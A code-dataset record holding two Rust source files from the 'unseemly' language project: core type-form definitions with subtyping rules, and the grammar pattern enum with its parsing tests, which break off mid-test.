repo
stringlengths
6
65
file_url
stringlengths
81
311
file_path
stringlengths
6
227
content
stringlengths
0
32.8k
language
stringclasses
1 value
license
stringclasses
7 values
commit_sha
stringlengths
40
40
retrieved_at
stringdate
2026-01-04 15:31:58
2026-01-04 20:25:31
truncated
bool
2 classes
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_type_forms.rs
src/core_type_forms.rs
// The type theory for Unseemly // is largely swiped from the "Types and Programming Languages" by Pierce. // I've agressively copied the formally-elegant but non-ergonomic theory // whenever I think that the ergonomic way of doing things is just syntax sugar over it. // After all, syntax sugar is the point of Unseemly! // // However, I expect that the core types of a typed macro language will are // part of the user interface (for example, they'd appear in generated module documentation). // Therefore, I used `enum` and `struct` instead of × and +. // There are two similar things (both stored as `Ast`s) we should distinguish! // (1) syntax for types, as written by the user // (2) types themselves, the result of type synthesis // // These things are almost identical, // which is why postive synth_type is usually implemented with `LiteralLike`. // Performing `SynthTy` translates from (1) to (2). Mainly, it resolves type variable references. // // We should also distinguish // (3) ___, (normally also called "types"). The ___ of an expression is a type, // and the ___ of a type is a kind. // // // It is at this point that I am reminded of a passage: // // Now in set theory, which deals with abstractions that we don't use all the time, a // stratification like the theory of types seems acceptable, even if a little strange-but when it // comes to language, an all-pervading part of life, such stratification appears absurd. We // don't think of ourselves as jumping up and down a hierarchy of languages when we speak // about various things. A rather matter-of-fact sentence such as, "In this book, I criticize // the theory of types" would be doubly forbidden in the system we are discussing. Firstly, it // mentions "this book", which should only be mentionable in a metabook-and secondly, it mentions // me-a person whom I should not be allowed to speak of at all! This example points out how silly // the theory of types seems, when you import it into a familiar context. The remedy it adopts for // paradoxes-total banishment of self-reference in any form-is a real case of overkill, branding // many perfectly good constructions as meaningless. The adjective "meaningless", by the way, // would have to apply to all discussions of the theory of linguistic types (such as that of this // very paragraph) for they clearly could not occur on any of the levels-neither object language, // nor metalanguage, nor metametalanguage, etc. So the very act of discussing the theory // would be the most blatant possible violation of it! // // — Douglas Hofstadter, Gödel, Escher, Bach: an Eternal Golden Braid use crate::{ ast::*, ast_walk::{ walk, WalkRule::{self, *}, }, form::{simple_form, BiDiWR, Both, Form, Positive}, grammar::{FormPat, SynEnv}, name::*, ty::{synth_type, SynthTy, TyErr}, ty_compare::{Canonicalize, Subtype}, util::assoc::Assoc, walk_mode::NegativeWalkMode, }; use std::rc::Rc; // TODO #3: I think we need to extend `Form` with `synth_kind`... pub fn type_defn(form_name: &str, p: FormPat) -> Rc<Form> { Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: Both(LiteralLike, LiteralLike), synth_type: Positive(LiteralLike), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked), }) } fn type_defn_complex( form_name: &str, p: FormPat, sy: WalkRule<SynthTy>, tc: BiDiWR<Canonicalize, Subtype>, ) -> Rc<Form> { Rc::new(Form { name: n(form_name), grammar: Rc::new(p), type_compare: tc, synth_type: Positive(sy), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked), }) } thread_local! { // Not needed by the user. // An internal type to keep the compiler from trying to dig into the `Expr` in `Expr<X>`. pub static primitive_type : Rc<Form> = Rc::new(Form { name: n("primitive_type"), grammar: Rc::new(form_pat!([(named "name", atom)])), type_compare: Both(LiteralLike, LiteralLike), synth_type: Positive(LiteralLike), quasiquote: Both(LiteralLike, LiteralLike), eval: Positive(NotWalked) }) } pub fn get__primitive_type(called: Name) -> Ast { ast!({primitive_type.with(|p_t| p_t.clone()) ; "name" => (at called)}) } fn is_primitive(form: &Rc<Form>) -> bool { form == &primitive_type.with(|p_t| p_t.clone()) } fn make_core_syn_env_types() -> SynEnv { // Regarding the value/type/kind hierarchy, Benjamin Pierce generously assures us that // "For programming languages ... three levels have proved sufficient." // kinds (TODO #3: actually use these) let _type_kind = simple_form("Type", form_pat!((lit "*"))); let _higher_kind = simple_form( "higher", form_pat!( (delim "k[", "[", [ (star (named "param", (call "kind"))), (lit "->"), (named "res", (call "kind"))])), ); // types let fn_type = type_defn_complex( "fn", form_pat!((delim "[", "[", [ (star (named "param", (call "Type"))), (lit "->"), (named "ret", (call "Type") ) ])), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |fn_parts| { let actual = fn_parts.context_elt(); let actual_parts = Subtype::context_match(&fn_parts.this_ast, &actual, fn_parts.env.clone())?; let expd_params = fn_parts.get_rep_term(n("param")); let actl_params = actual_parts.get_rep_leaf_or_panic(n("param")); if expd_params.len() != actl_params.len() { return Err(TyErr::LengthMismatch( actl_params.iter().map(|&a| a.clone()).collect(), expd_params.len(), )); } for (p_expected, p_got) in expd_params.iter().zip(actl_params.iter()) { // Parameters have reversed subtyping: let _: Assoc<Name, Ast> = walk::<Subtype>(*p_got, &fn_parts.with_context(p_expected.clone()))?; } walk::<Subtype>( &fn_parts.get_term(n("ret")), &fn_parts.with_context(actual_parts.get_leaf_or_panic(&n("ret")).clone()), ) }), ), ); let enum_type = type_defn( "enum", form_pat!( (delim "{", "{", (star (delim "+[", "[", [(named "name", atom),(star (named "component", (call "Type")))])))), ); let struct_type = type_defn_complex( "struct", form_pat!( (delim "*[", "[", (star [(named "component_name", atom), (lit ":"), (named "component", (call "Type"))]))), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |struct_parts| { let actual_struct_parts = Subtype::context_match( &struct_parts.this_ast, struct_parts.context_elt(), struct_parts.env.clone(), )?; for (got_name, got_ty) in actual_struct_parts .get_rep_leaf_or_panic(n("component_name")) .iter() .zip(actual_struct_parts.get_rep_leaf_or_panic(n("component"))) { let mut found = false; for (exp_name, exp_ty) in struct_parts .get_rep_term(n("component_name")) .iter() .zip(struct_parts.get_rep_term(n("component"))) { if got_name.to_name() != exp_name.to_name() { continue; } found = true; let _ = walk::<Subtype>(&got_ty, &struct_parts.with_context(exp_ty.clone()))?; } if !found { return Err(TyErr::NonexistentStructField( got_name.to_name(), struct_parts.this_ast, )); } } Ok(assoc_n!()) }), ), ); let tuple_type = type_defn_complex( "tuple", form_pat!((delim "**[", "[", (star (named "component", (call "Type"))))), LiteralLike, Both(LiteralLike, LiteralLike), ); let forall_type = type_defn_complex( "forall_type", form_pat!([(lit "forall"), (star (named "param", atom)), (lit "."), (named "body", (import [* [forall "param"]], (call "Type")))]), LiteralLike, // synth is normal Both( LiteralLike, cust_rc_box!(move |forall_parts| { match Subtype::context_match( &forall_parts.this_ast, forall_parts.context_elt(), forall_parts.env.clone(), ) { // ∀ X. ⋯ <: ∀ Y. ⋯ ? (so force X=Y) Ok(actual_forall_parts) => { let actl_inner_body = actual_forall_parts.get_leaf_or_panic(&n("body")); walk::<Subtype>( &forall_parts.get_term(n("body")), &forall_parts.with_context(actl_inner_body.clone()), ) } // ∀ X. ⋯ <: ⋯ ? (so try to specialize X) Err(_) => { // `import [forall "param"]` handles the specialization, // and we leave the context element alone walk::<Subtype>(&forall_parts.get_term(n("body")), &forall_parts) } } }), ), ); // This behaves slightly differently than the `mu` from Pierce's book, // because we need to support mutual recursion. // In particular, it relies on having a binding for `param` in the environment! // The only thing that `mu` actually does is suppress substitution, // to prevent the attempted generation of an infinite type. let mu_type = type_defn_complex( "mu_type", form_pat!([(lit "mu_type"), (star (named "param", (import [prot "param"], varref))), (lit "."), (named "body", (import [* [prot "param"]], (call "Type")))]), LiteralLike, Both( LiteralLike, cust_rc_box!(move |mu_parts| { let rhs_mu_parts = Subtype::context_match( &mu_parts.this_ast, mu_parts.context_elt(), mu_parts.env.clone(), )?; let rhs_body = rhs_mu_parts.get_leaf_or_panic(&n("body")); let r_params = rhs_mu_parts.get_rep_leaf_or_panic(n("param")); let l_params = mu_parts.get_rep_term(n("param")); if r_params.len() != l_params.len() { return Err(TyErr::LengthMismatch( r_params.iter().cloned().cloned().collect(), l_params.len(), )); } // Apply the Amber rule; assume the `mu`ed names are subtypes to subtype the bodies let mut amber_environment = mu_parts.env.clone(); for (&ee_r, ee_l) in r_params.iter().zip(l_params.iter()) { let (p_r, p_l) = if let (ExtendEnv(r, _), ExtendEnv(l, _)) = (ee_r.c(), ee_l.c()) { (&*r, &*l) } else { icp!("ill-formed mu_type") }; if p_r == p_l // short-circuit if the names are the same... || mu_parts.env.find(&p_r.vr_to_name()) // ...or Amber assumed so already == Some(p_l) { continue; } amber_environment = amber_environment.set(p_r.vr_to_name(), p_l.clone()); } walk::<Subtype>( &mu_parts.get_term(n("body")), &mu_parts .with_environment(amber_environment) .with_context(rhs_body.clone()), ) }), ), ); // TODO: add named repeats. Add type-level numbers! // TODO: We probably need kinds, to say that `T` is a tuple // TODO: we'll need dotdotdot inside betas, also, huh? let dotdotdot_type = type_defn( "dotdotdot_type", form_pat!((delim ":::[", "[", [(star (named "driver", varref)), (lit ">>"), (named "body", (call "Type"))])), ); let forall_type_0 = forall_type.clone(); // [Type theory alert!] // Pierce's notion of type application is an expression, not a type; // you just take an expression whose type is a `forall`, and then give it some arguments. // Instead, we will just make the type system unify `forall` types with more specific types. // But sometimes the user wants to write a more specific type, and they use this. // // This is, at the type level, like function application. // We restrict the LHS to being a name, because that's "normal". Should we? let type_apply = type_defn_complex( "type_apply", // TODO: this ad-hoc rule to allow `A<B>` without spaces ... isn't ideal. form_pat!([(named "type_rator", (call "Type")), (call "DefaultSeparator"), (lit_tok (scan "(<)"), "<"), (star (named "arg", (call "Type"))), (call "DefaultSeparator"), (lit_tok (scan "(>)"), ">")]), // TODO: shouldn't it be "args"? cust_rc_box!(move |tapp_parts| { use crate::util::mbe::EnvMBE; let arg_res = tapp_parts.get_rep_res(n("arg"))?; let rator_res = tapp_parts.get_res(n("type_rator"))?; match rator_res.c() { VariableReference(rator_vr) => { // e.g. `X<int, Y>` underneath `mu X. ...` // Rebuild a type_apply, but evaulate its arguments // This kind of thing is necessary because // we wish to avoid aliasing problems at the type level. // In System F, this is avoided by performing capture-avoiding substitution. let mut new__tapp_parts = EnvMBE::new_from_leaves( assoc_n!("type_rator" => ast!((vr *rator_vr))), ); let mut args = vec![]; for individual__arg_res in arg_res { args.push(EnvMBE::new_from_leaves( assoc_n!("arg" => individual__arg_res.clone()), )); } new__tapp_parts.add_anon_repeat(args); if let Node(ref f, _, ref exp) = tapp_parts.this_ast.c() { Ok(raw_ast!(Node(/* forall */ f.clone(), new__tapp_parts, exp.clone()))) } else { icp!() } } Node(ref got_f, ref lhs_parts, ref exports) if is_primitive(got_f) => { // Like the above; don't descend into `Expr` let mut new__tapp_parts = EnvMBE::new_from_leaves(assoc_n!("type_rator" => raw_ast!(Node(got_f.clone(), lhs_parts.clone(), exports.clone())))); let mut args = vec![]; for individual__arg_res in arg_res { args.push(EnvMBE::new_from_leaves( assoc_n!("arg" => individual__arg_res.clone()), )); } new__tapp_parts.add_anon_repeat(args); if let Node(f, _, exp) = tapp_parts.this_ast.c() { Ok(raw_ast!(Node(/* forall */ f.clone(), new__tapp_parts, exp.clone()))) } else { icp!() } } Node(ref got_f, ref forall_type__parts, _) if got_f == &forall_type_0 => { // This might ought to be done by a specialized `beta`... let params = forall_type__parts.get_rep_leaf_or_panic(n("param")); if params.len() != arg_res.len() { panic!("[kind error] wrong number of arguments"); } let mut new__ty_env = tapp_parts.env; for (name, actual_type) in params.iter().zip(arg_res) { new__ty_env = new__ty_env.set(name.to_name(), actual_type); } // This bypasses the binding in the type, which is what we want: synth_type( crate::core_forms::strip_ee( forall_type__parts.get_leaf_or_panic(&n("body")), ), new__ty_env, ) } _ => { panic!("[kind error] {} is not a forall.", rator_res); } } }), Both(LiteralLike, LiteralLike), ); assoc_n!("Type" => Rc::new(form_pat![ // Disambiguate `forall T. Foo<T>` so it doesn't get parsed as `(forall T. Foo)<T>`: (biased (scope forall_type), (alt (scope fn_type), // TODO: these should turn into `primitive_type`s in the core type environment. // First, we need a really simple core type environment for testing, // and then to change all the `uty!({Type Int :})`s into `uty!(Int)`s // (and `ast!({"Type" "Int" :})`s into `ast!((vr "Int"))`). (scope type_defn("Ident", form_pat!((name_lit "Ident")))), (scope type_defn("Int", form_pat!((name_lit "Int")))), (scope type_defn("Nat", form_pat!((name_lit "Nat")))), (scope type_defn("Float", form_pat!((name_lit "Float")))), (scope type_defn("String", form_pat!((name_lit "String")))), (scope enum_type), (scope struct_type), (scope tuple_type), (scope dotdotdot_type), (scope mu_type), (scope type_apply), varref)) ])) } thread_local! { pub static core_type_forms: SynEnv = make_core_syn_env_types(); } pub fn get_core_types() -> SynEnv { core_type_forms.with(|ctf| ctf.clone()) } pub fn find_type(form_name: &str) -> Rc<Form> { core_type_forms.with(|ctf| crate::core_forms::find_form(ctf, "Type", form_name)) } // TODO #4: this should be extensible for when the syntax environment is extended... // or just automatically have one type per NT. Probably the latter. pub fn nt_to_type(nt: Name) -> Ast { if nt == n("Type") || nt == n("Pat") || nt == n("Expr") { get__primitive_type(nt) } else { icp!("unknown NT {}", nt) } } // TODO #4: make this extensible, too! When the user creates a new NT, // do they need to specify the direction? pub fn nt_is_positive(nt: Name) -> bool { if nt == n("Type") || nt == n("Expr") || nt == n("DefaultReference") { true } else if nt == n("Pat") || nt == n("Atom") || nt == n("Ident") { // TODO: Remove "Ident" entirely. // HACK: "Ident" and "DefaultAtom" are just not walked; this should probably be three-armed false } else { icp!("unknown NT {}", nt) } } pub fn less_quoted_ty(t: &Ast, nt: Option<Name>, loc: &Ast) -> Result<Ast, crate::ty::TypeError> { // suppose that this is an expr, and `body` has the type `Expr<String>`: expect_ty_node!( (t ; crate::core_forms::find_core_form("Type", "type_apply") ; loc) tapp_parts; { if let Some(nt) = nt { // Check it if you got it ty_exp!( tapp_parts.get_leaf_or_panic(&n("type_rator")), &get__primitive_type(nt), loc ); } let args = tapp_parts.get_rep_leaf_or_panic(n("arg")); if args.len() != 1 { ty_err!(LengthMismatch(args.into_iter().cloned().collect(), 1) at loc); } // ...returns `String` in that case Ok(args[0].clone()) } ) } pub fn more_quoted_ty(t: &Ast, nt: Name) -> Ast { ast!({"Type" "type_apply" : "type_rator" => (, get__primitive_type(nt)), "arg" => [(, t.clone())]}) } #[test] fn parametric_types() { // Are plain parametric types valid? without_freshening! { // (so we don't have to compute alpha-equivalence) assert_eq!( synth_type(&ast!({"Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] (vr "t"))}), Assoc::new()), Ok(ast!({"Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] (vr "t"))}))); } let ident_ty = ast!( { "Type" "Ident" : }); let nat_ty = ast!( { "Type" "Nat" : }); let para_ty_env = assoc_n!( "unary" => ast!({ "Type" "forall_type" : "param" => ["t"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (, nat_ty.clone()) ], "ret" => (vr "t") })}), "binary" => ast!({ "Type" "forall_type" : "param" => ["t", "u"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ (vr "t"), (vr "u") ], "ret" => (, nat_ty.clone()) })})); let mued_ty_env = assoc_n!("unary" => ast!((vr "unary")), "binary" => ast!((vr "binary"))); // If `unary` is `mu`ed, `unary< ident >` can't be simplified. assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]}), mued_ty_env.clone() ), Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]})) ); // If `unary` is `mu`ed, `unary< [nat -> nat] >` can't be simplified. assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ { "Type" "fn" : "param" => [(, nat_ty.clone())], "ret" => (, nat_ty.clone())} ]}), mued_ty_env.clone() ), Ok(ast!({ "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ { "Type" "fn" : "param" => [(, nat_ty.clone())], "ret" => (, nat_ty.clone())} ]})) ); // Expand the definition of `unary`. assert_eq!( synth_type( &ast!( { "Type" "type_apply" : "type_rator" => (vr "unary"), "arg" => [ (, ident_ty.clone()) ]}), para_ty_env ), Ok(ast!({ "Type" "fn" : "param" => [(, nat_ty.clone() )], "ret" => (, ident_ty.clone())})) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/grammar.rs
src/grammar.rs
#![macro_use] use crate::{ ast::Ast, beta::{Beta, ExportBeta}, form::Form, name::*, runtime::{eval::Value, reify}, util::assoc::Assoc, }; use std::{boxed::Box, clone::Clone, rc::Rc}; custom_derive! { /// `FormPat` defines a pattern in a grammar. Think EBNF, but more extended. /// Most kinds of grammar nodes produce an `Ast` of either `Shape` or `Env`, /// but `Named` and `Scope` are special: /// everything outside of a `Named` (up to a `Scope`, if any) is discarded, /// and `Scope` produces a `Node`, which maps names to what they got. #[derive(Debug, Clone, Reifiable, PartialEq)] pub enum FormPat { /// Matches 0 tokens, produces the `Ast` Anyways(Ast), /// Never matches Impossible, /// Matches actual text! /// The regex must have a single capturing group. /// The optional string is a TextMate syntax category. Scan(Scanner, Option<String>), /// Marks this rule as too commonly-used to be informative; /// prevents display of this rule in parse errors, Common(Rc<FormPat>), /// Matches an atom or varref, but not if it's on the list of reserved words Reserved(Rc<FormPat>, Vec<Name>), /// Matches if the sub-pattern equals the given name Literal(Rc<FormPat>, Name), /// Matches an atom, turns it into a `VariableReference` VarRef(Rc<FormPat>), /// Matches an ordered sequence of patterns. Seq(Vec<Rc<FormPat>>), /// Matches zero or more occurrences of a pattern. Star(Rc<FormPat>), /// Matches one or more occurrences of a pattern. Plus(Rc<FormPat>), /// Matches any of the sub-pattersn. Alt(Vec<Rc<FormPat>>), /// Matches the LHS pattern, or, failing that, the RHS pattern. Biased(Rc<FormPat>, Rc<FormPat>), /// Lookup a nonterminal in the current syntactic environment. Call(Name), /// This is where syntax gets extensible. /// Parses its body in the syntax environment computed from /// the LHS and the current syntax environment. SynImport(Rc<FormPat>, Rc<FormPat>, SyntaxExtension), /// Makes a node and limits the region where names are meaningful. `Beta` defines export. Scope(Rc<Form>, ExportBeta), /// Matches a pattern and gives it a name (inside the current `Scope`) Named(Name, Rc<FormPat>), /// Like a `Scope`, but just returns whatever has the given name Pick(Rc<FormPat>, Name), /// FOOTGUN: NameImport(Named(...), ...) is almost always wrong. /// (write Named(NameImport(..., ...)) instead) /// TODO: make this better NameImport(Rc<FormPat>, Beta), /// Like `NameImport`, but affects all phases. NameImportPhaseless(Rc<FormPat>, Beta), /// Quote syntax (the boolean indicates whether it's positive or negative) QuoteDeepen(Rc<FormPat>, bool), /// Escape syntax quotation (by some number of levels) QuoteEscape(Rc<FormPat>, u8) } } impl std::fmt::Display for FormPat { fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { write!(f, "{}", self.mark_up(None)) } } impl FormPat { pub fn mark_up(&self, pos: Option<usize>) -> String { match self { Anyways(ref ast) => { let contents = format!("{}", ast); if contents.len() > 20 { format!("anyways{{⋯}}anyways") } else { format!("anyways{{ {} }}anyways", contents) } } Impossible => format!("impossible"), Scan(ref scanner, _) => format!("/{}/", scanner.0), Common(ref body) => format!("common ({})", body), Reserved(ref body, ref names) => format!( "{} reserving {}", body, names.iter().map(|name| format!("'{}'", name)).collect::<Vec<_>>().join(" ") ), Literal(ref _body, name) => format!("\x1b[34m{}\x1b[0m", name), VarRef(ref body) => format!("vr ({})", body), Seq(ref elts) => { let mut formatted_elts = elts.iter().map(|e| format!("{}", e)).collect::<Vec<_>>(); if let Some(pos) = pos { formatted_elts.insert(pos, "•".to_string()); } format!("[{}]", formatted_elts.join(" ")) } Star(ref body) => format!("{} *", body), Plus(ref body) => format!("{} +", body), Alt(ref elts) => format!( "alt[{}]alt", elts.iter().map(|e| format!("{}", e)).collect::<Vec<_>>().join(" ") ), Biased(ref plan_a, ref plan_b) => format!("{} or{{{}}}or", plan_a, plan_b), // In macro definitions, we need a type here, but it's not present in the grammar: Call(ref name) => format!(",{{{}}},", name), SynImport(ref def, ref body, ref _synex) => match pos { None => format!("??syntax extension {} => {} ??", def, body), Some(0) => format!("??syntax extension • {} => {} ??", def, body), Some(1) => format!("??syntax extension {} => • {} ??", def, body), Some(2) => format!("??syntax extension {} => {} • ??", def, body), _ => icp!(), }, Scope(ref form, ref ebeta) => { format!("'{{{}}}' ??? -> .{{??}}. => {:?}", form.grammar, ebeta) } Named(name, ref body) => format!("{} := ({})", name, body), Pick(ref body, name) => format!("pick {} in {}", name, body), NameImport(ref body, ref beta) => format!("{} <-- {:?}", body, beta), NameImportPhaseless(ref body, ref beta) => format!("{} <--?? {:?}", body, beta), QuoteDeepen(ref body, pos) => format!("??deepen?? {} {}", body, pos), QuoteEscape(ref body, levels) => format!("??escape?? {} {}", body, levels), } } // Finds all `Named` nodes, and how many layers of repetition they are underneath. pub fn binders(&self) -> Vec<(Name, u8)> { use tap::tap::Tap; match *self { Named(n, ref body) => vec![(n, 0)].tap_mut(|v| v.append(&mut body.binders())), Seq(ref bodies) | Alt(ref bodies) => { let mut res = vec![]; for body in bodies { res.append(&mut body.binders()); } res } Scope(_, _) | Pick(_, _) => vec![], // No more bindings in this scope Star(ref body) | Plus(ref body) => { body.binders().into_iter().map(|(n, depth)| (n, depth + 1)).collect() } // TODO: since these belong under `Named`, I suspect they ought to return an empty Vec. SynImport(ref body, _, _) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => body.binders(), Biased(ref body_a, ref body_b) => { body_a.binders().tap_mut(|v| v.append(&mut body_b.binders())) } Anyways(_) | Impossible | Literal(_, _) | Scan(_, _) | VarRef(_) | Call(_) => vec![], } } // In this grammar, what kind of thing is `n` (if it's present at all)? pub fn find_named_call(&self, n: Name) -> Option<Name> { match *self { Named(this_n, ref sub) if this_n == n => { // Pass though any number of `Import`s: let mut sub = sub; while let NameImport(ref new_sub, _) = **sub { sub = new_sub; } match **sub { Call(nt) => Some(nt), _ => None, } } Named(_, _) => None, // Otherwise, skip Call(_) => None, // TODO: `Pick` should return a result. Scope(_, _) | Pick(_, _) => None, // Only look in the current scope Anyways(_) | Impossible | Scan(_, _) => None, Star(ref body) | Plus(ref body) | SynImport(ref body, _, _) | NameImport(ref body, _) | NameImportPhaseless(ref body, _) | Literal(ref body, _) | VarRef(ref body) | QuoteDeepen(ref body, _) | QuoteEscape(ref body, _) | Common(ref body) | Reserved(ref body, _) => body.find_named_call(n), Seq(ref bodies) | Alt(ref bodies) => { for body in bodies { let sub_fnc = body.find_named_call(n); if sub_fnc.is_some() { return sub_fnc; } } None } Biased(ref body_a, ref body_b) => { body_a.find_named_call(n).or_else(|| body_b.find_named_call(n)) } } } /// Map regular expressions (as strings) to their TextMate categories. /// This is a loose approximation of the impossible task of syntax-highlighting a `FormPat`. pub fn textmate_categories(&self) -> Vec<(String, String)> { match self { Scan(scanner, name) => match name { Some(name) => vec![( format!("{}", scanner.0) .strip_prefix("^") .unwrap() .replace(r#"\/"#, r#"/"#) .to_string(), name.clone(), )], None => vec![], }, Reserved(body, reserved) => { // TODO: modify `Reserved` to allow customization let mut res = body.textmate_categories(); let matcher = reserved .iter() .map(|word| regex::escape(&word.orig_sp())) .collect::<Vec<_>>() .join("|"); res.push((matcher, "keyword".to_string())); res } Literal(_, lit) => { vec![(regex::escape(&lit.orig_sp()), "keyword.operator".to_string())] } Scope(form, _) => form.grammar.textmate_categories(), Anyways(_) | Impossible | Call(_) => vec![], Common(body) | VarRef(body) | Star(body) | Plus(body) | SynImport(_, body, _) | Named(_, body) | Pick(body, _) | NameImport(body, _) | NameImportPhaseless(body, _) | QuoteDeepen(body, _) | QuoteEscape(body, _) => body.textmate_categories(), Biased(lhs, rhs) => { let mut res = lhs.textmate_categories(); res.append(&mut rhs.textmate_categories()); res } Seq(bodies) | Alt(bodies) => { let mut res = vec![]; for body in bodies { res.append(&mut body.textmate_categories()); } res } } } } #[derive(Clone)] pub struct SyntaxExtension( pub Rc<Box<(dyn Fn(crate::earley::ParseContext, Ast) -> crate::earley::ParseContext)>>, ); impl PartialEq for SyntaxExtension { /// pointer equality! (for testing) fn eq(&self, other: &SyntaxExtension) -> bool { self as *const SyntaxExtension == other as *const SyntaxExtension } } // This kind of struct is theoretically possible to add to the `Reifiable!` macro, // but is it worth the complexity? impl reify::Reifiable for SyntaxExtension { fn ty_name() -> Name { n("SyntaxExtension") } fn reify(&self) -> Value { reify::reify_2ary_function(self.0.clone()) } fn reflect(v: &Value) -> Self { SyntaxExtension(reify::reflect_2ary_function(v.clone())) } } impl std::fmt::Debug for SyntaxExtension { fn fmt(&self, formatter: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { formatter.write_str("[syntax extension]") } } pub fn new_scan(regex: &str, cat: Option<String>) -> FormPat { Scan(Scanner(regex::Regex::new(&format!("^{}", regex)).unwrap()), cat) } #[derive(Clone)] pub struct Scanner(pub regex::Regex); impl PartialEq for Scanner { fn eq(&self, other: &Scanner) -> bool { self.0.as_str() == other.0.as_str() } } impl reify::Reifiable for Scanner { fn ty_name() -> Name { n("Scanner") } fn reify(&self) -> Value { <String as reify::Reifiable>::reify(&self.0.as_str().to_owned()) } fn reflect(v: &Value) -> Self { Scanner(regex::Regex::new(&<String as reify::Reifiable>::reflect(v)).unwrap()) } } impl std::fmt::Debug for Scanner { fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { write!(f, "[scanner {:?}]", self.0.as_str()) } } pub type SynEnv = Assoc<Name, Rc<FormPat>>; pub use crate::earley::parse; /// Parse `tt` with the grammar `f` in an empty syntactic environment. /// `Call` patterns are errors. pub fn parse_top(f: &FormPat, toks: &str) -> Result<Ast, crate::earley::ParseError> { crate::earley::parse_in_syn_env(f, Assoc::new(), toks) } use self::FormPat::*; #[test] fn basic_parsing() { fn mk_lt(s: &str) -> Rc<FormPat> { Rc::new(Literal(Rc::new(new_scan(r"\s*(\S+)", None)), n(s))) } let atom = Rc::new(new_scan(r"\s*(\S+)", None)); assert_eq!(parse_top(&Seq(vec![atom.clone()]), tokens_s!("asdf")).unwrap(), ast_shape!("asdf")); assert_eq!( parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "fork" "asdf") ) .unwrap(), ast_shape!("asdf" "fork" "asdf") ); assert_eq!( parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "fork" "asdf") ) .unwrap(), ast_shape!("asdf" "fork" "asdf") ); parse_top( &Seq(vec![atom.clone(), mk_lt("fork"), atom.clone()]), tokens_s!("asdf" "knife" "asdf"), ) .unwrap_err(); assert_eq!( parse_top( &Seq(vec![Rc::new(Star(Rc::new(Named(n("c"), mk_lt("*"))))), mk_lt("X")]), tokens_s!("*" "*" "*" "*" "*" "X") ) .unwrap(), ast_shape!({- "c" => ["*", "*", "*", "*", "*"] } "X") ); } #[test] fn alternation() { assert_eq!( parse_top(&form_pat!((alt (lit_aat "A"), (lit_aat "B"))), tokens_s!("A")), Ok(ast!("A")) ); assert_eq!( parse_top(&form_pat!((alt (lit_aat "A"), (lit_aat "B"))), tokens_s!("B")), Ok(ast!("B")) ); assert_eq!( parse_top( &form_pat!((alt (lit_aat "A"), (lit_aat "B"), [(lit_aat "X"), (lit_aat "B")])), tokens_s!("X" "B") ), Ok(ast!(("X" "B"))) ); assert_eq!( parse_top( &form_pat!((alt [(lit_aat "A"), (lit_aat "X")], (lit_aat "B"), [(lit_aat "A"), (lit_aat "B")])), tokens_s!("A" "B") ), Ok(ast!(("A" "B"))) ); assert_eq!( parse_top( &form_pat!((alt (lit_aat "A"), (lit_aat "B"), [(lit_aat "A"), (lit_aat "B")])), tokens_s!("A" "B") ), Ok(ast!(("A" "B"))) ); } #[test] fn advanced_parsing() { use crate::form::simple_form; assert_eq!( parse_top( &form_pat!([(star (named "c", (alt (lit_aat "X"), (lit_aat "O")))), (lit_aat "!")]), tokens_s!("X" "O" "O" "O" "X" "X" "!") ) .unwrap(), ast_shape!({- "c" => ["X", "O", "O", "O", "X", "X"]} "!") ); // TODO: this hits the bug where `earley.rs` doesn't like nullables in `Seq` or `Star` assert_eq!( parse_top( &form_pat!( (star (biased [(named "c", (anyways "ttt")), (alt (lit_aat "X"), (lit_aat "O"))], [(named "c", (anyways "igi")), (alt (lit_aat "O"), (lit_aat "H"))]))), tokens_s!("X" "O" "H" "O" "X" "H" "O") ) .unwrap(), ast!({ - "c" => ["ttt", "ttt", "igi", "ttt", "ttt", "igi", "ttt"]}) ); let ttt = simple_form("tictactoe", form_pat!( [(named "c", (alt (lit_aat "X"), (lit_aat "O")))])); let igi = simple_form("igetit", form_pat!( [(named "c", (alt (lit_aat "O"), (lit_aat "H")))])); assert_eq!( parse_top( &form_pat!((star (named "outer", (biased (scope ttt.clone()), (scope igi.clone()))))), tokens_s!("X" "O" "H" "O" "X" "H" "O") ) .unwrap(), ast!({ - "outer" => [{ttt.clone(); ["c" => "X"]}, {ttt.clone(); ["c" => "O"]}, {igi.clone(); ["c" => "H"]}, {ttt.clone(); ["c" => "O"]}, {ttt.clone(); ["c" => "X"]}, {igi; ["c" => "H"]}, {ttt; ["c" => "O"]}]}) ); assert_eq!( parse_top( &form_pat!( (star (named "it", (pick [(named "even", varref_aat), (named "odd", varref_aat)], "odd")))), tokens_s!("A" "B" "C" "D" "E" "F") ) .unwrap(), ast!({- "it" => [(vr "B"), (vr "D"), (vr "F")]}) ); let pair_form = simple_form( "pair", form_pat!([(named "lhs", (lit_aat "a")), (named "rhs", (lit_aat "b"))]), 